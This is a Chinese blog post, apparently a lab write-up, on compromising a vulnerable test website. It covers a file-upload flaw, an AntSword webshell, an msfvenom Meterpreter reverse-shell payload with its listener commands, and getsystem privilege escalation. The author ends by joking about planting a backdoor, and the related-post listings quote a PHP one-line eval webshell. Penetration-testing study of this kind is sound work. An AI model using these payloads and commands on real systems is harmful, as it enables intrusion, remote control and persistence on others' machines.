记一次网站攻击到提权的全部过程

已于 2023-04-18 16:17:43 修改
阅读量8w 收藏 12
点赞数 3
文章标签: 安全 web安全 网络 php
于 2023-02-22 18:01:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lkbzhj/article/details/129166864
版权

准备

靶机:win10系统(被攻击方)

入侵者:win10系统,kali系统

首先启动win10系统,搭建一个存在漏洞的网站,这里就继续用以前搭建好的网站,映射到局域网,使我们能够正常访问。

在此站点中拿到webshell

文件上传漏洞 

1.选择工具----附件分类管理

2.选择创建资源分类 

(添加支持的附件类型.php) 

 3.选择文件资源管理,并上传文件。

4.文件上传成功,且目录中存在shell文件

 5.使用蚁剑或者菜刀连接

到此,成功连接,拿到webshell 

反弹shell连接

kali制作exe反弹木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.130 LPORT=4444 -f exe -o 123.exe

 

木马上传 

讲做好的exe木马通过连接的webshell进行上传。

上传成功

启动kali中的msf

执行监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.52.130
set lport 4444
exploit

 

运行木马

msf开启监听之后,去蚁剑webshell中执行上传的木马。

运行成功后,回到kali中的msf回连成功,创建会话。

 提权

查看所拥有的用户权限

为普通用户权限,在之前的蚁剑中已经知道对方是win10系统,采用windows的载荷攻击

用getsystem提权

直接提权成功

功能测试

查看系统信息

拍照对方电脑桌面状态

结语 

至此,成功拿到system权限,可以干很多很多事情.....当然是首先留后门了!哈哈哈.......

BTY@BTY
关注
  • 3
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux通过反弹Shell提权实验
qq_59201520的博客
02-20 1015
通过反弹shell在Linux上提权的实验
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和提权示例(一)
whyrookie的博客
04-15 7066
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国、敏感文件分析、SSH远程连接、Sh...
网站攻击+提权基本步骤
weixin_47691728的博客
06-28 3259
网站攻击+提权基本步骤
网络安全提权攻击
qq_51068285的博客
02-17 947
提权攻击的原理与防护
渗透提权-解决tcp限制神器
Sumarua的博客
06-22 413
渗透提权-解决tcp限制神器 资源已上传至☞:https://download.csdn.net/download/weixin_43510203/12543331
大马提权详细过程
18年3月萌新白帽子
06-25 1万+
1.首先利用菜刀连接我们上传的小马文件2.在网站的www根目录下上传我们准备好的的大马文件3.这里我们上传的大马名称是chao.asp4.之后打开浏览器访问我们刚刚登陆的大马文件地址,并输入密码clever5.登陆进去之后如果发现CMD功能无法使用那么我们就自己通过菜刀上传一个CMD,我将其命名为smallchao.exe6.点击大马页面左侧的执行CMD这一栏7.在shell路径这一栏里输入服务器...
中国简介
m0_73721944的博客
03-28 1397
一句话木马:在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此。中国和中国菜刀类似,是一款webshell终端管理工具,主要面向合法授权的渗透测试安全人员及常规操作的管理员。(1)php的代码要写在
Admx_new靶机之BurpSuite内容替换、MSF漏洞利用、Wordpress后台漏洞利用、上线、利用MySQL提权
qq_40898302的博客
05-12 495
1) Ctrl + Z 将shell放置后台 2) 输入 stty raw -echo 3) 输入 fg 将后台进程调用到前台 4) 关闭所有程序 5) 确定kali有bash ls /bin/bash 6) 将 zsh 改成 bsh sudo chsh -s /bin/bash 7) 重启 8) 输入 echo $SHELL 显示 /bin/bash 成功 9) 重新监听。有的系统漏洞只能触发一次,所以打点成功,基于这个shell获取更多的shell,利用多种方式,多种途径去获得更多的shell。
Linux Polkit本地提权
02-07
描述:Polkit 是用于在类 Unix 操作系统中控制系统范围特权的组件。它为非特权进程提供了与特权进 程进行通信的有组织的方式。CVE-2021-4034,polkit 的...利用:上传exp,给权限执行cve-2021-4034-poc提权获得root权限
一次Linux系统被攻击的分析过程.pdf
09-06
在本文中,我们将对 Linux 服务器被攻击的分析过程进行详细的介绍,探讨服务器遭受攻击的原因、解决方法和防范措施。 Linux 服务器遭受攻击的原因可以归纳为七种:口令攻击、拒绝服务攻击网络欺骗攻击网络监听...
一次Linux系统被攻击的分析过程
01-09
IT行业发展到现在,安全问题已经变得至关重要,从近的“棱镜门”事件中,折射出了很多安全问题,信息安全问题已变得刻不容缓,而做为运维人员,必须了解一些安全运维准则,同时,要保护自己所负责的业务,首先要站在...
渗透测试全过程
12-04
我先感慨一下,在做网络安全这些年感觉一直在漂,从05年刚到北京的远东到08年的大连,再到11年的启明,没有一个地方能让人感到是在踏实的做安全,对网络安全人才这块也都不重视。从圈内群的好友里得知,有很多技术...
webshell管理工具之使用
不秃头的程序Yang
03-19 5461
一. 概述 中国是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。 二. 使用方法 1. 初始化 解压文件AntSword-v2.0.1-windows-x64.zip,antSword-master.zip. AntSword-v2.0.1为加载器 antSword-master为源码 双击AntSword-v2.0.1中的AntSword.exe。 点击初始化 2. 上传小马到WEB服务器 <?php @eval($_POST['
文件上传漏洞(一句话木马)-学习笔
热门推荐
小龙在线
08-21 1万+
在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权 限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马
与一句话木马
m0_55771794的博客
07-15 5831
目录 一句话木马 一个关于php的例子 入侵条件 的下载与安装 在安装的时候注意 真题实践 一句话木马 先来说说一句话木马是什么东西 一句话木马,又简称(webshell),在很多渗透测试时,渗透人员会上传一句话木马到目前web服务目录继而提权获取系统权限。 举一个关于php的例子 <?php @eval($_POST['syc']);?> 它的原理呢,是利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以通过中国菜刀即可获取和控制整个网站目录。 ..
渗透怎么学?渗透测试中超全的提权思路来了!
bdfcfff77fa的博客
06-26 1071
尽量能够获取webshell,如果获取不到webshell可以在有文件上传的地方上传反弹shell脚本;或者利用漏洞(系统漏洞,服务器漏洞,第三方软件漏洞,漏洞)来获取shell。利用kali虚拟机msfVENOM编写反弹shell脚本被控制端发起的shell---通常用于被控制端因防火墙受限,权限不足、端口被占用。
拿到GETSHELL之后的提权
weixin_69678131的博客
05-12 1297
getshell之后的提权
[网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及管理员提权(四)
杨秀璋的专栏
03-27 1万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,各种Web渗透工具及操作串联在一起,挺有意思的。本文详细讲解了hack the box机器配置,通过OpenAdmin题目分享管理员权限Flag获取流程,希望对您有所帮助。同时,该网站题目细节不便于透露,推荐大家亲自去尝试,本文更多的分享一些思想。
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
最新发布
weixin_49715102的博客
06-09 971
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
shell kali
08-10
是一款针对Web渗透测试和服务器管理的开源工具,它可以帮助安全研究人员远程管理和控制目标服务器。而Kali Linux是一个基于Debian的Linux发行版,主要用于渗透测试和网络安全相关的任务。 如果你想在Kali Linux中使用,首先需要确保你已经安装了Java Runtime Environment (JRE)。然后你可以前往的官方网站(https://github.com/AntSwordProject/antSword)下载最新版本的。 下载完成后,解压缩文件并在终端中进入的目录。然后运行以下命令启动: ``` java -jar antSword.jar ``` 接下来,你将会看到的图形界面。在中,你可以添加目标服务器,并使用各种功能来执行命令、上传和下载文件、修改文件权限等。 需要注意的是,使用进行远程管理和控制服务器需要合法授权和使用,确保你只在合法的环境中使用该工具。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值